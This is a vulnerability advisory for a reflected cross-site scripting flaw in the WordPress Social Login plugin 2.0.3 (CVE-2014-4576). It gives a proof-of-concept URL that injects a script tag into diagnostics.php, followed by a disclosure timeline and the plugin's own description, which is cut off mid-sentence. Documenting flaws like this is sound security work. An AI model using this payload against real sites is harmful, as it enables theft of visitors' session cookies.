wp-plugin : wordpress-social-login

Plugin Details
Plugin Name: wp-plugin : wordpress-social-login
Effected Version : 2.0.3 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/wordpresssociallogin/services/diagnostics.php?xhrurl=xhrurl%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4576
Plugin Description :
[| Using <strong>WordPress Social Login</strong>, your blog's users will be able to login and comment with social networks such as Twitter, Facebook, Google and Yahoo. <strong>WordPress Social Login</strong> also allows you to import users contact list from Google Gmail, Facebook, Windows Live and LinkedIn. <strong>WordPress Social Login</strong> gives you absolute control over users access to your website and comes with a painfully long list of rules and restrictions for you to setup. <strong>Free, unlimited and white-label</strong> <br> Licenced under MIT License, WordPress Social Login available to everyone for completely free, with all features included, at absolutely no cost. You are free to use a WordPress Social Login in commercial websites as long as the copyright header is left intact. <strong>Built on top of an Open Source Library</strong><br> HybridAuth Library enable developers to easily build social applications to engage websites vistors and customers on a social level by implementing social signin, social sharing, users profiles, friends list, activities stream, status updates and more. <strong>23 supported social netwroks</strong> <br> Depending on the audience you're targeting, you can choose from a wide variety of providers and services including: Social networks, Microblogging platforms, Professional networks, Media, Photo sharing, Programmers and Gamers networks. <strong>Easy to customize and integrate </strong> <br> WordPress Social Login come with a simple but flexible and fully customizable authentication widget. And if you are a developer or designer then you can customize it to your heart's content, changing the css and icons is a matter of seconds. <strong>Even more features are planned</strong> <br> The coming release ]